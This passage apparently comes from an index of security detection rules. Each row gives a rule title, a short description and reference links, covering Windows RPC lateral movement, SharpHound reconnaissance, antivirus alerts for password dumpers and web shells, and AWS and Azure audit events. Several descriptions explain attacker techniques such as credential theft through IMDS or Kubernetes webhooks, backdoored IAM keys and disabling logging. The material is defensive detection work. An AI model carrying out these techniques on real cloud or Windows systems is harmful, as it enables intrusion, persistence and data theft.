https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Server Service Abuse |
Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Server Service Abuse for Lateral Movement |
Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Schedule Task Lateral Movement via SASec |
Detects remote RPC calls to create or execute a scheduled task via SASec |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Recon Activity via SASec |
Detects remote RPC calls to read information about scheduled tasks via SASec |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
SharpHound Recon Account Discovery |
Detects remote RPC calls useb by SharpHound to map remote connections and local group membership. |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
SharpHound Recon Sessions |
Detects remote RPC calls useb by SharpHound to map remote connections and local group membership. |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Ruby on Rails Framework Exceptions |
Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts |
http://edgeguides.rubyonrails.org/security.html, http://guides.rubyonrails.org/action_controller_overview.html, https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception, https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb |
Spring Framework Exceptions |
Detects suspicious Spring framework exceptions that could indicate exploitation attempts |
https://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html |
Potential SpEL Injection In Spring Framework |
Detects potential SpEL Injection exploitation, which may lead to RCE. |
https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection, https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
Suspicious SQL Error Messages |
Detects SQL error messages that indicate probing for an injection attack |
http://www.sqlinjection.net/errors |
Potential Server Side Template Injection In Velocity |
Detects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE. |
https://antgarsil.github.io/posts/velocity/, https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
Antivirus Exploitation Framework Detection |
Detects a highly relevant Antivirus alert that reports an exploitation framework.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
|
https://www.nextron-systems.com/?s=antivirus, https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797, https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424, https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466 |
Antivirus Hacktool Detection |
Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
|
https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/, https://www.nextron-systems.com/?s=antivirus |
Antivirus Password Dumper Detection |
Detects a highly relevant Antivirus alert that reports a password dumper.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
|
https://www.nextron-systems.com/?s=antivirus, https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619, https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448 |
Antivirus Ransomware Detection |
Detects a highly relevant Antivirus alert that reports ransomware.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
|
https://www.nextron-systems.com/?s=antivirus, https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916, https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7, https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045, https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d, https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c, https://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05 |
Antivirus Web Shell Detection |
Detects a highly relevant Antivirus alert that reports a web shell.
It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
|
https://www.nextron-systems.com/?s=antivirus, https://github.com/tennc/webshell, https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection, https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection, https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection, https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection, https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection, https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection, https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection, https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection |
Antivirus Relevant File Paths Alerts |
Detects an Antivirus alert in a highly relevant file path or with a relevant file name.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
|
https://www.nextron-systems.com/?s=antivirus |
Suspicious SQL Query |
Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields |
https://github.com/sqlmapproject/sqlmap |
AWS Attached Malicious Lambda Layer |
Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.
This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
|
https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html |
AWS CloudTrail Important Change |
Detects disabling, deleting and updating of a Trail |
https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html |
Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure |
Detects when an instance identity has taken an action that isn't inside SSM.
This can indicate that a compromised EC2 instance is being used as a pivot point.
|
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html, https://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/, https://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things |
New Network ACL Entry Added |
Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account.
|
https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ |
New Network Route Added |
Detects the addition of a new network route to a route table in AWS.
|
https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ |
Ingress/Egress Security Group Modification |
Detects when an account makes changes to the ingress or egress rules of a security group.
This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.
|
https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ |
LoadBalancer Security Group Modification |
Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB).
This can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.
|
https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ |
RDS Database Security Group Modification |
Detects changes to the security group entries for RDS databases.
This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users.
|
https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ |
Potential Malicious Usage of CloudTrail System Manager |
Detect when System Manager successfully executes commands against an instance.
|
https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/initial_access_via_system_manager.toml |
AWS Config Disabling Channel/Recorder |
Detects AWS Config Service disabling |
https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html |
AWS Console GetSigninToken Potential Abuse |
Detects potentially suspicious events involving "GetSigninToken".
An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.
|
https://github.com/NetSPI/aws_consoler, https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/ |
SES Identity Has Been Deleted |
Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities |
https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ |
AWS SAML Provider Deletion Activity |
Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access.
An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.
|
https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteSAMLProvider.html |
AWS S3 Bucket Versioning Disable |
Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects. |
https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82 |
AWS Key Pair Import Activity |
Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.
|
https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ImportKeyPair.html |
AWS EC2 Disable EBS Encryption |
Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.
Disabling default encryption does not change the encryption status of your existing volumes.
|
https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html |
AWS EC2 Startup Shell Script Change |
Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up. |
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9 |
AWS EC2 VM Export Failure |
An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance. |
https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance |
AWS ECS Task Definition That Queries The Credential Endpoint |
Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.
This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.
|
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py, https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html, https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html |
AWS EFS Fileshare Modified or Deleted |
Detects when a EFS Fileshare is modified or deleted.
You can't delete a file system that is in use.
If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.
|
https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html |
AWS EFS Fileshare Mount Modified or Deleted |
Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. |
https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html |
AWS EKS Cluster Created or Deleted |
Identifies when an EKS cluster is created or deleted. |
https://any-api.com/amazonaws_com/eks/docs/API_Description |
AWS ElastiCache Security Group Created |
Detects when an ElastiCache security group has been created. |
https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml |
AWS ElastiCache Security Group Modified or Deleted |
Identifies when an ElastiCache security group has been modified or deleted. |
https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml |
Potential Bucket Enumeration on AWS |
Looks for potential enumeration of AWS buckets via ListBuckets. |
https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md, https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html, https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/ |
AWS GuardDuty Important Change |
Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs. |
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9 |
AWS IAM Backdoor Users Keys |
Detects AWS API key creation for a user by another user.
Backdoored users can be used to obtain persistence in the AWS environment.
Also with this alert, you can detect a flow of AWS keys in your org.
|
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py |
AWS IAM S3Browser Templated S3 Bucket Policy Creation |
Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "". |
https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor |
AWS IAM S3Browser LoginProfile Creation |
Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile. |
https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor |
AWS IAM S3Browser User or AccessKey Creation |
Detects S3 Browser utility creating IAM User or AccessKey. |
https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor |
New AWS Lambda Function URL Configuration Created |
Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls.
This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
|
https://docs.aws.amazon.com/lambda/latest/dg/API_CreateFunctionUrlConfig.html, https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc, https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws |
AWS Glue Development Endpoint Activity |
Detects possible suspicious glue development endpoint activity. |
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/, https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html |
AWS RDS Master Password Change |
Detects the change of database master password. It may be a part of data exfiltration. |
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py |
Modification or Deletion of an AWS RDS Cluster |
Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information. |
https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html, https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html, https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance |
Restore Public AWS RDS Instance |
Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. |
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py |
AWS Root Credentials |
Detects AWS root account usage |
https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html |
AWS Route 53 Domain Transfer Lock Disabled |
Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. |
https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml, https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html, https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html |
AWS Route 53 Domain Transferred to Another Account |
Detects when a request has been made to transfer a Route 53 domain to another AWS account. |
https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml |
AWS S3 Data Management Tampering |
Detects when a user tampers with S3 data management in Amazon Web Services. |
https://github.com/elastic/detection-rules/pull/1145/files, https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html, https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html |
AWS SecurityHub Findings Evasion |
Detects the modification of the findings on SecurityHub. |
https://docs.aws.amazon.com/cli/latest/reference/securityhub/ |
AWS Snapshot Backup Exfiltration |
Detects the modification of an EC2 snapshot's permissions to enable access from another account |
https://www.justice.gov/file/1080281/download |
AWS Identity Center Identity Provider Change |
Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider.
A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.
|
https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html, https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html, https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html |
AWS STS AssumeRole Misuse |
Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges. |
https://github.com/elastic/detection-rules/pull/1214, https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html |
AWS STS GetSessionToken Misuse |
Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. |
https://github.com/elastic/detection-rules/pull/1213, https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html |
AWS Suspicious SAML Activity |
Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. |
https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html, https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html |
AWS User Login Profile Was Modified |
Detects activity when someone is changing passwords on behalf of other users.
An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.
|
https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation |
Azure Active Directory Hybrid Health AD FS New Server |
This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.
A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.
This can be done programmatically via HTTP requests to Azure.
|
https://o365blog.com/post/hybridhealthagent/ |
Azure Active Directory Hybrid Health AD FS Service Delete |
This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.
A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.
The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.
|
https://o365blog.com/post/hybridhealthagent/ |
User Added to an Administrator's Azure AD Role |
User Added to an Administrator's Azure AD Role |
https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/ |
Azure Application Deleted |
Identifies when a application is deleted in Azure. |
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy |
Azure Application Gateway Modified or Deleted |
Identifies when a application gateway is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Application Security Group Modified or Deleted |
Identifies when a application security group is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Application Credential Modified |
Identifies when a application credential is modified. |
https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/ |
Azure Container Registry Created or Deleted |
Detects when a Container Registry is created or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Number Of Resource Creation Or Deployment Activities |
Number of VM creations or deployment activities occur in Azure via the azureactivity log. |
https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml |
Azure Device No Longer Managed or Compliant |
Identifies when a device in azure is no longer managed or compliant |
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory |
Azure Device or Configuration Modified or Deleted |
Identifies when a device or device configuration in azure is modified or deleted. |
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory |
Azure DNS Zone Modified or Deleted |
Identifies when DNS zone is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes |
Azure Firewall Modified or Deleted |
Identifies when a firewall is created, modified, or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Firewall Rule Collection Modified or Deleted |
Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Granting Of Permissions To An Account |
Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. |
https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml |
Azure Keyvault Key Modified or Deleted |
Identifies when a Keyvault Key is modified or deleted in Azure. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Key Vault Modified or Deleted |
Identifies when a key vault is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Keyvault Secrets Modified or Deleted |
Identifies when secrets are modified or deleted in Azure. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Kubernetes Admission Controller |
Identifies when an admission controller is executed in Azure Kubernetes.
A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.
The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.
An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.
For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.
An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.
An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
|
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes |
Azure Kubernetes Cluster Created or Deleted |
Detects when a Azure Kubernetes Cluster is created or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Azure Kubernetes CronJob |
Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.
Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.
An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
|
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/, https://kubernetes.io/docs/concepts/workloads/controllers/job/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ |
Azure Kubernetes Events Deleted |
Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml |
Azure Kubernetes Network Policy Change |
Identifies when a Azure Kubernetes network policy is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Azure Kubernetes Pods Deleted |
Identifies the deletion of Azure Kubernetes Pods. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml |
Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted |
Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Azure Kubernetes Sensitive Role Access |
Identifies when ClusterRoles/Roles are being modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Azure Kubernetes Secret or Config Object Access |
Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Azure Kubernetes Service Account Modified or Deleted |
